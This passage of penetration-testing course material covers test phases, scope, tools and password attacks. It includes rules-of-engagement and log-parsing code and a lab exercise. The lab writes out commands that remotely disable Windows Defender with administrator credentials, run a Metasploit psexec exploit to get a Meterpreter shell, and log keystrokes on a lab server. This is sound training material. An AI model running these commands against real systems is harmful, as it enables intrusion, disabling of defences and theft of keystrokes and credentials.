Once the tester breaches the organization's systems, they can install backdoors, rootkits, and other persistence mechanisms that enable them to maintain access in the future. This helps illustrate vulnerabilities that can harm the organization over the long term, even after an active breach has been identified. Any persistence the tester installs must be permitted by the ROE, recorded in the tester's activity log, and removed (or handed over for removal) when the engagement ends.
5. Reporting
The tester must conclude their operations by reporting their findings to the appropriate personnel. The report is the primary deliverable of a pen test. Reports are vital in debriefing these personnel on the vulnerabilities found in the test, the risks these vulnerabilities pose to the organization, and any suggested ways to mitigate these problems. An executive summary that managers can understand should be included, along with very specific technical results for the IT staff.

Figure 6-6: The phases of a typical penetration test.

Pen Tester's Knowledge of the Target

When it comes to the first phase of the pen test, reconnaissance, there are three possible approaches:
• The black box approach simulates an outside attacker who would know nothing about the target. The pen tester must do their own reconnaissance.
• The white box approach simulates an inside attacker who would have extensive knowledge about the target. The pen tester does not need to perform their own reconnaissance, as this is provided for them.
• The grey box approach simulates an inside attacker that knows something about a target, but not everything. The pen tester must do additional reconnaissance beyond what has been provided to them.

Instructor note: Here you could start a discussion regarding the trade-off between time/cost vs. information gleaned from these tests.

Pen Test Scope

It's important for your organization to define the scope of these tests before you begin. You need to know exactly what you are and are not allowed to do. Otherwise, you may interrupt important business processes that could in turn introduce unwanted, serious risk to the organization. Likewise, not going far enough in your tests will limit their effectiveness, and you could potentially miss significant vulnerabilities. Some of the limitations that define the scope of your tests can include:
• Which tools you may and may not use.
• Which techniques you may and may not use.
• Which systems, address ranges, and personnel are in scope, and which are explicitly excluded.
• When you are allowed to conduct the tests, both time and date.
• How often you are allowed to conduct tests.
• Knowing when to stop to prevent further disruption to the business.
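The scope limits listed above, together with the Targets and Execution components of the ROE, translate naturally into a check that runs before each action rather than a document that is read once at kickoff. The following Python class is an added example, not from this course: the ROE values, address ranges, technique names, and halt events are hypothetical, and the structure is a simplification of a real engagement's paperwork. It handles two cases that tend to go wrong in practice, a testing window that crosses midnight and an explicit exclusion (here, the domain controller) that sits inside an otherwise in-scope range.

```python
# Added example (not from the CFR course): check each planned action against
# the engagement's signed ROE before it is launched. The ROE values, address
# ranges, technique names and halt events below are hypothetical.
import ipaddress
from datetime import datetime, time


class OutOfScope(Exception):
    """Raised when a planned action falls outside the ROE."""


class RulesOfEngagement:
    def __init__(self, in_scope, excluded, window_start, window_end,
                 allowed_techniques, halt_events):
        self.in_scope = [ipaddress.ip_network(n) for n in in_scope]
        self.excluded = [ipaddress.ip_network(n) for n in excluded]
        self.window = (window_start, window_end)    # wall-clock, inclusive
        self.allowed_techniques = set(allowed_techniques)
        self.halt_events = set(halt_events)         # agreed "stop the test" triggers

    def host_in_scope(self, host):
        addr = ipaddress.ip_address(host)
        # An explicit exclusion wins even when the host sits inside an in-scope range.
        if any(addr in net for net in self.excluded):
            return False
        return any(addr in net for net in self.in_scope)

    def time_in_window(self, when):
        start, end = self.window
        t = when.time()
        if start <= end:
            return start <= t <= end
        return t >= start or t <= end   # window crosses midnight, e.g. 22:00-06:00

    def check(self, host, technique, when):
        """Return the list of ROE violations for one action; an empty list means go."""
        problems = []
        if not self.host_in_scope(host):
            problems.append(f"{host} is not an authorized target")
        if technique not in self.allowed_techniques:
            problems.append(f"technique '{technique}' is not named in the ROE")
        if not self.time_in_window(when):
            problems.append(f"{when:%Y-%m-%d %H:%M} is outside the testing window")
        return problems

    def authorize(self, host, technique, when):
        """Raise OutOfScope instead of silently continuing when a check fails."""
        problems = self.check(host, technique, when)
        if problems:
            raise OutOfScope("; ".join(problems))
        return True

    def must_halt(self, event):
        """True when an observed event is one the ROE says ends the test."""
        return event in self.halt_events


def filter_plan(roe, plan):
    """Split (host, technique, datetime) actions into approved and rejected lists."""
    approved, rejected = [], []
    for host, technique, when in plan:
        problems = roe.check(host, technique, when)
        (rejected if problems else approved).append((host, technique, problems))
    return approved, rejected


# Hypothetical ROE: overnight window, the domain controller excluded, three techniques.
ROE = RulesOfEngagement(
    in_scope=["10.20.0.0/24", "203.0.113.0/25"],
    excluded=["10.20.0.5/32"],
    window_start=time(22, 0), window_end=time(6, 0),
    allowed_techniques=["port_scan", "vuln_scan", "web_app_test"],
    halt_events=["production_outage", "customer_data_modified"],
)
PLAN = [  # constructed test plan: two actions fit the ROE, four do not
    ("10.20.0.10",    "port_scan",          datetime(2024, 3, 4, 23, 30)),
    ("10.20.0.5",     "port_scan",          datetime(2024, 3, 4, 23, 30)),
    ("10.20.0.10",    "social_engineering", datetime(2024, 3, 4, 23, 30)),
    ("203.0.113.40",  "web_app_test",       datetime(2024, 3, 5, 9, 0)),
    ("203.0.113.200", "vuln_scan",          datetime(2024, 3, 5, 1, 0)),
    ("203.0.113.40",  "vuln_scan",          datetime(2024, 3, 5, 5, 59)),
]

if __name__ == "__main__":
    approved, rejected = filter_plan(ROE, PLAN)
    for host, technique, _ in approved:
        print(f"GO       {technique:<18} {host}")
    for host, technique, problems in rejected:
        print(f"REFUSED  {technique:<18} {host}: {'; '.join(problems)}")
```

The check reports every violation for an action rather than stopping at the first, which is what the white team wants to see when a rejected action is escalated. Wrapping the real scanner or exploit launcher in authorize() turns the ROE from a document the tester has to remember into a gate the tooling cannot bypass by accident.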
External vs. Internal Pen Testing


When you decide to perform penetration testing, you'll need to determine who will perform the actual testing: someone in your organization or an external consultant.
There may be benefits to hiring an external consultant. Consultants who perform penetration testing on a daily basis for a wide variety of customers are likely to have developed more extensive skills than someone who does penetration testing for only one company, probably on top of many other security and IT tasks within their job description. Pen testers with the greatest variety and volume of experience are likely the most skilled and are likely to offer deep insights into your security problems. Furthermore, an external pen tester may be more objective than an internal one. They will be less likely to have social connections within your organization or be influenced by your organization's office politics. A pen tester with grievances might focus an attack on a particular person's area of responsibility or might dismiss issues in a system managed by a friend.
On the other hand, there are also benefits to using only internal staff for your penetration testing. If you already have someone on staff who has pen testing skills, it may be less expensive to have them perform your pen testing than to hire an external consultant. Furthermore, if you use an external pen tester, you are authorizing an external party to perform otherwise illegal attacks on your network. In the case of white box or grey box testing, you may be handing sensitive information over to them before they even start testing. If you don't trust your pen tester, think carefully before providing such critical access.
In some cases, you may not have a choice; you may be required to take on an external pen tester as required by regulations.

Pen Testing Technique Categories

Some professionals organize pen testing techniques by category. These categories are:
• Physical: As mentioned previously, this category of techniques targets hardware and other physical assets, and occasionally includes social engineering.
• Technical: These techniques target computing processes. A technical vulnerability is one that a computer can identify and mitigate against, such as an SQL injection dumping the contents of a database.
• Logical: These techniques also target computing processes, but logical vulnerabilities can only be truly analyzed by humans. A computer is not necessarily equipped to assess the context of a given situation. It may take a person to determine when a network log shows malicious activity versus when it doesn't, based on their own judgment. A business logic flaw is a typical case: a checkout that accepts a negative quantity and issues a refund is handling perfectly well-formed input, and only someone who understands the intended workflow will recognize it as a vulnerability.
• Operational: These techniques target business processes.
Note: Social engineering can span multiple categories. Whereas an attack like tailgating is physical in nature, an attack like phishing can be considered operational in nature since it can trick key personnel who have an impact on day-to-day business operations into causing harm to those operations.

Pen Testing Techniques

The following are some of the most common and successful pen testing techniques you may choose to employ:
• Exploitation of system and network vulnerabilities
The primary technique employed by pen testers is to take advantage of a vulnerability in the organization's systems. For example, you can execute code on a host that escalates user privileges due to some flaw in the operating system. Or, you can execute unauthorized queries on a web server that fails to properly validate input. There are many more such examples of system exploitation.
• War driving
You can drive around your office building or other private facilities owned by the organization to identify any broadcasting Wi-Fi signals. If any signals leak off premises and into a public space like the roads outside, you can identify the wireless access points (WAPs) used by the organization. This is helpful in the scanning phase.
• Eavesdropping
Eavesdropping can be done using software that is installed on a computer to track user actions, or it can be done using a traditional audio recorder planted in a secret place. You should clearly understand your test's scope and consider the ethics involved in eavesdropping on communications before implementing this technique, as well as its legality based on your jurisdiction.
• Network sniffing
Sniffing a network for its packets is useful in intercepting unencrypted data, which can reveal vulnerabilities in the organization's network infrastructure.
• Physical security testing
All of the virtual security controls in the world won't do your organization much good if someone can simply walk in and steal a laptop without being caught. It's important that you test the efficacy of physical security protocols like access controls at doors, surveillance cameras, and placement of devices. Depending on the nature of these tests, you should consider informing law enforcement before you run them; otherwise, the police won't know that "breaking in" to your office building is actually part of an authorized test, and not a real crime. Testers should also carry a copy of the signed authorization with the client's emergency contact details so they can prove the test is legitimate on the spot.
• Social engineering
Tactics such as dumpster diving and impersonation will likely reveal the human-centric vulnerabilities in your organization. Assessing the ease with which an attacker can trick employees into breaking security protocols is important to your overall test. Like with eavesdropping, deceiving people has ethical implications that you should be mindful of. You don't want to undermine your employees' trust in you or their trust in coworkers.

Instructor note: Consider asking students if they have any techniques to add, based on their experience or research.

Pen Testing Tools of the Trade

A penetration tester's toolkit consists of a wide variety of tools, some of which are used in many other security contexts. Pen testers look for tools that fulfill the different phases of pen testing, especially those that provide reconnaissance/scanning and exploitation functionalities. Tools that can maintain access and have good reporting capabilities are a plus, but not as essential.
The following table lists some of the more popular tools used by pen testers.

Tool    Description

Nmap    This open source network scanning tool is one of the most popular, and often comes with its GUI version, Zenmap. Nmap can help a pen tester by scanning the status of network ports, enumerating host information like its operating system, and identifying the IP addresses of all active hosts on a network.

Nessus    This vulnerability scanning tool, sold commercially by Tenable, can also assist a pen tester in identifying the weaknesses in their targets. It also has port scanning and operating system enumeration capabilities.

hping    This open source packet-crafting tool provides a pen tester with the ability to build custom TCP/IP packets, including spoofed ones, to probe how firewalls and intrusion detection systems (IDSs) handle unusual traffic.

John the Ripper    This open source password cracking utility is one of the most popular, and often comes with its GUI version, Johnny. John the Ripper can use a number of cracking techniques like dictionary based, brute force, and hybrid, against a wide variety of hashing algorithms like Message Digest 5 (MD5) and Secure Hash Algorithm (SHA).

Cain & Abel    This freeware password cracking utility for Windows also has the ability to use a number of hashing algorithms to crack passwords in a variety of ways. It also comes with many other hacking capabilities, including Address Resolution Protocol (ARP) spoofing, network sniffing, recording Voice over IP (VoIP) communications, and more. It is no longer maintained.

Metasploit Framework    An open source exploitation framework with a large library of exploits available. Metasploit is meant to be modular, which helps penetration testers adapt and write their own exploits and combine them with their payload of choice. Metasploit can also integrate with a number of scanning tools like Nmap, Nessus, and Nexpose.

Core Impact™    A proprietary exploitation framework developed by Core Security® that provides an advanced platform for penetration testing. Along with reconnaissance, scanning, and exploitation, Core Impact also comes with a robust reporting feature. However, at tens of thousands of dollars, Core Impact may be too expensive for some organizations.

CANVAS    A proprietary exploitation framework developed by Immunity that offers exploitation features similar to Core Impact. However, CANVAS does not provide the same level of support for reconnaissance and scanning. CANVAS is less expensive, but will still run your organization several thousand dollars in licensing.

Kali Linux

Another essential pen testing tool is Kali Linux. Kali Linux™ is a free suite of open source tools built into a custom Linux® distribution, maintained by the Offensive Security group. It is the successor to BackTrack, a defunct Linux distribution maintained by Offensive Security, and like BackTrack, Kali Linux has become somewhat of a de facto platform for many security professionals.
Kali Linux is an operating system built specifically to be used by penetration testers, computer forensic experts, and security auditors. It comes prepackaged with more than 300 different security tools, almost all of which are open source, and many of them industry recognized. Such tools include:
• Nmap, a network scanner.
• Wireshark, a network traffic analysis tool.
• Metasploit Framework, a suite of exploits used to compromise a remote system.
• John the Ripper, an offline password cracking utility.
• Aircrack-ng, a wireless packet capture and WEP/WPA key cracking suite.
• Burp Suite, a tool that can be used as an interception proxy for analyzing traffic and modifying traffic to exploit web apps.
• Ettercap, a network protocol analyzer and man-in-the-middle exploitation tool.
• OWASP ZAP, a web app vulnerability testing tool that has interception proxy capabilities comparable to Burp Suite.
• THC Hydra, an online password cracking utility.
• Maltego, a reconnaissance tool used in open source intelligence gathering.
• sqlmap, a tool that detects and exploits SQL injection flaws in web applications and the databases behind them.
• Social-Engineer Toolkit, a framework for launching phishing, spoofing, and other social engineering attacks.

Figure 6-7: Tool categories in Kali Linux.

Kali Linux is also fully customizable, so you can construct a distribution with or without certain tools to tailor it to your own needs. Installation images of Kali Linux come in 32-bit and 64-bit versions, as well as versions targeting the ARM architecture used by Google Chromebooks™, Raspberry Pi® devices, and others. An Android™-specific distribution called Kali NetHunter supports multiple devices.

Data Mining in the Public Internet


D

Numerous information sources for hackers are available through the web. A simple web search reveals links to various tools, methodologies, and lists of vulnerabilities. The web is publicly available and does not discriminate. It is useful to both attackers and security specialists looking to defend their systems against attack.

Consider reminding students about metadata analysis and the Fingerprinting Organizations with Collected Archives (FOCA) tool.

While the web provides a vast and general source of hacking tools and techniques, it can also serve as a source of very specific information that can be used in an attack on a particular organization or its systems. For example, one might be able to connect with an attacker who is selling specific information and even access to a target.

Common tools, such as Google's search engine, can provide extremely detailed information for free if you know where to find these tools and know how to use them. Various types of Google hacks (really just advanced search queries) take advantage of Google's vast body of information and advanced search capabilities to focus on very specific technical information that might be useful to a pen tester. As a simple example, the Google search link: query operator enables you to find sites that link to another site. For example, link:www.develetech.com produces a list of sites that link to www.develetech.com. The site: operator limits a Google search to a particular site or domain. The filetype: operator limits results to a specific file type. Google provides many other operators. Used in combination, they can make quick work of searching for specific content in specific locations.

Lesson 6: Assessing the Organization's Security Posture | Topic D



For example, logging and configuration data that should not be exposed may easily be found this
way. A worst-case scenario for an organization (or a best-case from the perspective of an attacker)
might be a report from intrusion detection, vulnerability assessments, or penetration testing that just
happens to be residing in an exposed location.
Consider demonstrating a site like https://www.shodan.io and how it can be used to access poorly secured online devices.

Google Hacking Database
The Google Hacking Database (GHDB) at https://www.exploit-db.com/google-hacking-database/ provides a list of techniques that might be useful to attackers or pen testers, including search queries that can reveal such things as:
• Footholds (can help a hacker gain a foothold on a web server).
• Files containing user names.
• Files containing passwords.
• Files containing useful information.
• Error messages that reveal too much information.
• Sensitive directories (directories that should not be shared but are).
• Vulnerable files.
• Vulnerable servers.
• Web server detection (web server profiling information).
• Sensitive online shopping information.
• Network or vulnerability data.
• Pages containing login portals.
• Online devices, such as printers, cameras, and so forth.
• Servers with faulty applications, scripts, and so forth, which have known vulnerabilities.
Attack Surface Scanning and Mapping

Attack surface scanning and mapping is about looking at the system from an attacker's perspective to identify:
• Vulnerabilities that enable unauthorized access and activities on a particular system.
• Which system components are most vulnerable.
• Where you need to focus testing and remediation.
The fewer the open pathways and the harder they are to open, the safer your systems are. These pathways may include such things as web URLs and parameters, applications, scripts, functions, unused or unsecured system services, application programming interfaces (APIs), web forms, plug-ins, cookies, databases, open ports and sockets, and admin IDs and passwords.

Packet Manipulation for Enumeration


ot

Once an attacker gains access to a network, host, or system, they will commonly perform an enumeration attack to discover the next layer of attack targets. Enumeration means gathering a list of resources that are on that network, host, or system. These resources then become potential subsequent targets further into the pen test. These resources might be such things as:
• Running applications and services.
• Network devices and hosts.
• Directories and files.
• Storage shares.
• User accounts.
• APIs.
Enumeration typically requires being able to make a request or query of some sort, and then receiving a response, which is a list of resources. In some cases, defenses may have already been put into place to prevent such requests. It may be possible to use packet manipulation to issue a request and receive a response for the purpose of enumeration.

Packet Crafting
An attacker or pen tester might want to enumerate all of the protections in place at a particular location, such as rules in place on a firewall or IDS. One way to accomplish this is by methodically staging a series of mock attacks, designed to see how the system responds to specific intrusions. An attacker might use a technique called packet crafting to accomplish this. With packet crafting, the attacker creates new packets from scratch (rather than capturing and modifying packets from existing traffic), which are custom built to trigger a response if a certain rule is in place but otherwise go undetected.


Figure 6-8: Testing a firewall's open ports with a crafted packet.



Password Attacks
There are several methods you can use to expose passwords in plaintext to test your systems' security. These password attacks can be grouped into two categories: online and offline.

Online password attacks involve attempting to log in to a live system by guessing a user's password. You can do this manually or with the help of automated tools. Either way, this type of attack can be very slow and unreliable, especially in systems that restrict the number of login attempts you can make in a certain time period. You may end up being locked out of an account if you make too many unsuccessful guesses. Repeated login attempts may also alert security staff to your actions, again making it difficult to execute an attack successfully.

Offline attacks, on the other hand, involve capturing and working with a password hash or a set of hashes. This is more commonly referred to as password cracking. Offline cracking attempts do not require that the tester interact with a live authentication system; instead, the tester simply hashes password guesses and compares them to the actual password hashes they have stolen. Assuming you possess these hashes, offline attacks are quicker and more reliable than online attacks. This is especially true when you incorporate rainbow tables. Using rainbow tables dramatically reduces the time needed to crack a password. The biggest limitations to any offline password attack are time and processing power, and even then, they are more powerful than most online attacks.


Note: You can also use pass the hash techniques to crack user credentials during a pen test.

Note: On a Windows system, password hashes are stored in the SAM database within the Registry at HKEY_LOCAL_MACHINE\SAM, which requires SYSTEM privileges to access. On a Linux system, password hashes are stored in the /etc/shadow file, which requires superuser privileges to access.

Penetration Test Follow-Up

Following a penetration test, you must identify assets that have been flagged as vulnerable, and you must identify possible ways to remediate systems. Just as you do following an internal vulnerability assessment, use a risk management approach to methodically identify security and compliance risks that you can accept or transfer, and others that you need to reduce or avoid. Be sure to involve others in this process as required, such as those working in compliance and business roles.

Implement corrections for each vulnerability. Once you have implemented your new configuration, establish new reference baselines for configuration monitoring, update your documentation, and follow up with any reporting required by regulatory compliance and your internal policies.

Note: If you hired a consultant, a remediation proposal may have been included in the report.

Guidelines for Conducting Penetration Testing
Follow these guidelines when conducting penetration testing.

Conduct Penetration Testing
When conducting penetration testing:
• Determine if the pen test will be performed internally or by an external vendor.
• Determine if the test will be conducted in secret or if it will be public knowledge.
• Identify clear boundaries for protecting sensitive information during the test.
• Ensure there is a written ROE document.
• Determine if the security department will be involved in the test.
• Identify all relevant stakeholders in the test.
• Consider including any wireless local area networks (WLANs) in the test.
• Assess the security of the physical premises.
• Test any security awareness program that's in effect, including through social engineering, if allowed.
• Identify weaknesses surrounding employees accessing the network through a virtual private network (VPN).
• Follow up on the results of a pen test by sharing actionable findings with the organization.

ACTIVITY 6-4
Conducting Penetration Testing on Network Assets

Before You Begin

You'll be using your Kali Linux VM in this activity to attack your Windows Server 2019 computer.

Scenario
You've identified the vulnerabilities in your organization with the help of Greenbone Vulnerability Management (GVM). Now it's time to exploit those vulnerabilities. You'll begin a penetration test on your network using Kali Linux. You decide to familiarize yourself with Metasploit, a well-known tool included in Kali Linux. You'll be using Metasploit to open a remote shell onto a target server, where you can execute privileged commands on the server. You also want to test out Armitage, a GUI tool that can help you visualize the exploit more easily.

1. Turn off Windows Security on the server remotely.
a) From the Kali Linux desktop, open a terminal.
b) At the terminal, enter:
smbmap -d DEVELETECH -u Administrator -p Pa22w0rd -H 10.39.5.# -x 'powershell.exe /c Set-MpPreference -DisableRealtimeMonitoring $true'
Make sure to replace # with the last octet of your server's IP address.
The prompt should return if there were no errors in execution.
Ensure students are entering this command on a single line.
You remotely executed a Windows PowerShell command that turns off the Windows Security service. This is necessary because Windows Security identifies the payload you're about to use as malicious and prevents it from working properly.

2. Run the Metasploit Framework and identify search options.
a) At the terminal, enter sudo msfdb init

b) Enter msfconsole

Note: It may take a few moments for the console to initialize.

Your prompt should change to msf6 >.

c) At the msf6 > prompt, enter search -h to display the search command options.

Note: This command is very useful if you know what you are looking for, but it
often returns too many results for browsing exploits.

You can use the -h flag with most Metasploit commands to see options for that command.
d) Enter search CVE-2021-26855
This searches the Common Vulnerabilities and Exposures (CVE) database for a particular vulnerability in the Microsoft Exchange Server that enables remote code execution.

Note: This is just an example of a vulnerability. In this activity, you'll be exploiting a PsExec vulnerability in Windows.

3. Do an initial scan to find hosts.
a) Enter hosts
There are no hosts listed.


b) Enter db_nmap -A 10.39.5.0/24 to use Nmap from within Metasploit to discover and enumerate hosts.

Note: The scan will take a few minutes to run.

The -A flag combines host discovery, operating system detection, version detection, and traceroute.
c) When the scan finishes, observe the results of what Nmap was able to discover about each host.


Note: Nmap results are not always accurate. They may identify an incorrect
operating system running on a host, for example.

d) Enter hosts
Nmap has populated the hosts with the results of the Nmap scan, including information about each
one.

4. Use a Metasploit exploit to take control of your server.
a) Enter use exploit/windows/smb/psexec
Your command prompt changes to msf6 exploit(windows/smb/psexec) >.
b) Enter info to see information about this attack.
c) Enter show options and note the available options.
This attack needs an RHOST (a target). An SMBPass and an SMBUser will also be needed if the host does not allow guest access.
d) Enter set RHOST 10.39.5.#, where # is the last number in your Windows Server's IP address.
e) Enter set SMBPass Pa22w0rd
f) Enter set SMBUser Administrator
g) Enter show options again to check that your options are shown.
Explain that students can use this method to take control of the server because they cracked the administrator password earlier.


h) Enter exploit to run the attack with those options.
If you have access, it will upload Meterpreter to the system and your command prompt will change again to meterpreter >.

Note: If no session was created, run the same command again. If this doesn't work after a few tries, restart Metasploit, configure the same exploit as before, and try executing it again.

5. Run some rudimentary commands on the server.
a) Enter help to view the options for this powerful tool.
b) Enter cd '\' to go to the root directory on your server.

Note: The quotes are required.

c) Enter ls to view the directory listing for your server.
d) Enter exit to leave Meterpreter.
e) Enter back to return to the main Metasploit prompt.
f) Enter exit to return to the root command prompt.

6. Investigate more vulnerabilities using a Metasploit GUI included with Kali Linux.
a) At the terminal, enter armitage
Armitage is a tool that integrates with Metasploit.
b) In the Connect dialog box, accept the defaults (Host: 127.0.0.1, Port: 55553, User: msf) and select Connect.

c) A warning that the Metasploit RPC server is not started appears. Select Yes to start it.

Note: This may take a few minutes.

When the graphic interface appears, the hosts in the top-right window are already populated
because of your earlier Nmap scan. The bottom window is a command line just like you used in the
last section. A list of exploits is listed on the left.

d) Right-click the icon of your Windows Server 2019 (10.39.5.#) computer and select Scan.
Notice that in the bottom window, you are running a series of scans from the auxiliary section. You could have run each of these on your own in the command line if you wanted.
e) Wait for the scans to complete, and then right-click your Windows Server icon again and select Login→psexec.
f) Select the administrator account that appears.
The user name and password appear because of your earlier exploit at the command line.
g) Check the Use reverse connection check box.
h) Select Launch.
The same attack you ran at the command line runs here. Notice that your server icon changes to show it has been exploited.
i) Right-click your server icon and note the new Meterpreter menu with options for some of the capabilities you now have on the server.


j) Select Meterpreter 1→Explore→Log Keystrokes.
k) In the Log Keystrokes window, select Launch.
l) Switch to your Windows Server 2019 computer and log in as the administrator, if necessary.
m) In Windows Server 2019, press some keys, and note that they appear in the Meterpreter terminal.
If time permits, have students try additional exploits.
The keylogger works even without an open application, but you can also have students open Notepad and type some words or open a browser and type in a search term.

7. How would you defend against this attack?
A: Answers will vary, but might include: use an intrusion detection system (IDS)/intrusion prevention system (IPS), use two-factor authentication for administrator accounts, limit the number of administrator accounts, and ensure strong passwords.

8. What other tools would work well with the Metasploit Framework in a penetration testing environment?
A: Answers might include vulnerability scanners such as Nessus, Rapid7, and so on; password crackers like John the Ripper, Cain & Abel, Ncrack, and L0phtCrack; and Nmap and other port scanners.

9. Close Armitage.

10. Re-enable Windows Security on the server.
a) At the terminal, press the Up Arrow until you return to the smbmap command.
b) Change $true to $false and run the command.
c) Verify that the prompt returns without errors.

Summary
In this lesson, you used various techniques to assess the organization's security posture, including
auditing, vulnerability management, and penetration testing. An effective assessment program
combines all of these techniques to identify ways in which the organization can improve its security.
What vulnerability assessment tools do you currently use or plan to use in your organization?
A: Answers will vary. Vulnerability scanners are a popular choice, and students may have a preference for which specific tool they use, if they're given a choice. Other tools like protocol and packet analyzers are useful for assessing network-based behavior for vulnerabilities. For students who regularly assess software-based vulnerabilities, a fuzzer is likely part of their toolset.
Encourage students to use the social networking tools provided on the CHOICE Course screen to follow up with their peers after the course is completed for further discussion and resources to support continued learning.

Which pen testing techniques have you used and found to be effective?
A: Answers will vary, but will include any technique that enables you to discover unknown vulnerabilities or exploit a vulnerability. For example, war driving is helpful in the scanning phase, and network sniffing is useful in intercepting unencrypted data. Assessing the ease with which an attacker can trick employees into breaking a security protocol is important, but you must be careful about violating employees' trust during the pen test. Eavesdropping, dumpster diving, and impersonation can reveal human-centric vulnerabilities, but can also push ethical boundaries if your intentions are not well-communicated ahead of time.

Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
resources for a more continuous learning experience.
7 Collecting Cybersecurity Intelligence

Lesson Time: 2 hours, 45 minutes

Lesson Introduction

Even with the most thorough testing of a security infrastructure, at some point there will be problems. You may be able to stop them as they occur and before they cause any damage, or you may have to deal with investigation of an incident that you were unable to stop. Having good security intelligence at all times will help you keep your systems secure or make them secure again.
Lesson Objectives

In this lesson, you will:


• Design and implement a system of cybersecurity intelligence collection and analysis.
• Collect data from network-based security intelligence sources.
• Collect data from host-based security intelligence sources.


TOPIC A
Deploy a Security Intelligence Collection and Analysis Platform
The key to maintaining secure systems is obtaining information through a security intelligence collection and analysis platform.
Security Intelligence

The concept of security intelligence existed long before cybersecurity was a concern. Security intelligence is the process through which data generated in the ongoing use of information systems is collected, processed, integrated, evaluated, analyzed, and interpreted to provide insights into the evolving security status of those systems. Threat intelligence is also a part of security intelligence.
A comprehensive and effective security intelligence process can produce a variety of benefits for the organization, such as:
• Faster detection and remediation of threats.
• Improved regulatory compliance.
• Reduction of fraud, theft, and data leakage.
• Reduction of effort needed to provide security and deal with fallout related to breaches.
• The ability to detect potential weaknesses before an exploit actually occurs.
The Challenge of Security Intelligence Collection

The primary goals of security intelligence collection are to gather data about everything happening in the system and identify security problems revealed by that data. While these goals are simple to state, implementing a solution is typically anything but simple.
Challenge: Identifying what data is relevant
Description: The first challenges of security intelligence collection are identifying and obtaining all data that should be analyzed. This information comes from a wide variety of sources. In fact, any information source that reveals how and by whom the system is being accessed may potentially provide security intelligence. For example, system logs track the login activities of users, access to network resources, traffic across network ports, and so forth. All such information might be useful in providing security intelligence.

Challenge: Processing data to make it useful
Description: The sheer volume of data may itself be challenging, and the data may originate in a variety of different formats that may be hard to consolidate and make uniform to enable easy analysis. Moving all data to a single storage location for processing and analysis can also be challenging.

Challenge: Producing actionable intelligence
Description: Once the data has been captured and normalized, significant effort may be required to analyze it and identify anomalies that may point to a potential problem. A comprehensive dataset is more likely to capture data that identifies problems, but with more data comes a larger task to normalize, filter, and organize the data into a useful form.

Challenge: Time and effort needed to set up, configure, and maintain security tools
Description: Security intelligence tasks can be automated through individual tools or comprehensive solutions, such as security information and event management (SIEM), but some solutions may involve extensive scripting or manual processing.

Challenge: Keeping security data secure
Description: Many of the logs used in security intelligence collection contain information that is useful not only to those protecting the organization's information systems, but would also be useful to an attacker. By putting systems and processes to collect security intelligence in place, you may actually create more potential problems. Some exploits may be purposely designed to erase or modify logs to cover their tracks. Organizations need to protect logs and monitoring systems from unauthorized access, alteration, or destruction, especially as you add to the volume of information your systems collect.

Lesson 7: Collecting Cybersecurity Intelligence | Topic A

Security Intelligence Collection Lifecycle

Security intelligence collection is really about more than just collection, although collection is a big part of the process. Information regarding potential security problems is hidden within massive amounts of raw data produced as a byproduct through the ongoing use of your information systems. The security intelligence collection lifecycle involves various steps you perform to not only collect data, but also to process and analyze it so you can focus on the right data, which is formatted and organized to provide you with security intelligence.
Figure 7-1: Security intelligence collection lifecycle.


Several steps are involved in this process:
1. Planning and direction
Determine what data should be collected, monitored, and analyzed.
2. Collection
Obtain raw data from a variety of sources, such as directory audits, system logs, and network audits.
3. Processing
Normalize and format data in preparation for analysis.
4. Analysis and production
Identify relevant data and produce a report that identifies action items.
5. Dissemination and integration
Provide a report to those who have requested it or who can take action to resolve problems.
Much of this process can be automated to provide faster notifications of problems and faster resolution times. Commercial products and open source tools are available to help with specific aspects of this process, and many of the tools and data sources you will need are likely already in place. Security practitioners typically develop their own processes, toolkits, and preferences for performing security intelligence collection, but having a standard procedure and approach with standard tools can help to ensure you aren't skipping important steps or missing critical information.
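The lifecycle steps above, carried out over the repeated failed logins that the Password Attacks section says should alert security staff, as an added example that is not the course's own code; the log lines, hosts, users and addresses are constructed, and the threshold and time window are assumed values:

```python
"""Added example for this section (not code from the CFR-410 course): a small
security intelligence pipeline that walks the lifecycle steps in the text over
constructed log data, including the repeated failed logins that the Password
Attacks section says should alert security staff."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Collection: raw data from two sources. Hosts, users, addresses and lines are constructed.
LINUX_AUTH_LOG = """\
Mar  4 10:01:02 web01 sshd[2210]: Failed password for invalid user admin from 198.51.100.23 port 50112 ssh2
Mar  4 10:01:05 web01 sshd[2210]: Failed password for invalid user admin from 198.51.100.23 port 50113 ssh2
Mar  4 10:01:09 web01 sshd[2212]: Failed password for root from 198.51.100.23 port 50114 ssh2
Mar  4 10:01:12 web01 sshd[2212]: Failed password for root from 198.51.100.23 port 50115 ssh2
Mar  4 10:02:40 web01 sshd[2220]: Accepted publickey for deploy from 192.0.2.10 port 41222 ssh2
"""
# CSV export of Windows Security events: timestamp,host,event id,user,source IP
# (4625 = failed logon, 4624 = successful logon).
WINDOWS_LOGON_CSV = """\
2024-03-04T10:03:01,DC01,4625,Administrator,203.0.113.7
2024-03-04T10:03:03,DC01,4625,Administrator,203.0.113.7
2024-03-04T10:03:06,DC01,4625,Administrator,203.0.113.7
2024-03-04T10:03:08,DC01,4625,Administrator,203.0.113.7
2024-03-04T10:03:12,DC01,4624,Administrator,203.0.113.7
2024-03-04T10:15:00,DC01,4625,jsmith,192.0.2.55
"""
SYSLOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) (?P<host>\S+) "
    r"sshd\[\d+\]: (?P<result>Failed password|Accepted \w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+)")

def parse_linux_auth(text, year=2024):
    """Processing: map sshd syslog lines (which carry no year) onto one common schema."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue  # lines that do not fit the schema are left out rather than guessed at
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "host": m["host"], "user": m["user"], "src": m["src"],
                       "outcome": "failure" if m["result"].startswith("Failed") else "success"})
    return events

def parse_windows_logon(text):
    """Processing: map the Windows CSV export onto the same schema."""
    events = []
    for line in text.splitlines():
        ts, host, event_id, user, src = line.split(",")
        if event_id in ("4624", "4625"):
            events.append({"ts": datetime.fromisoformat(ts), "host": host, "user": user,
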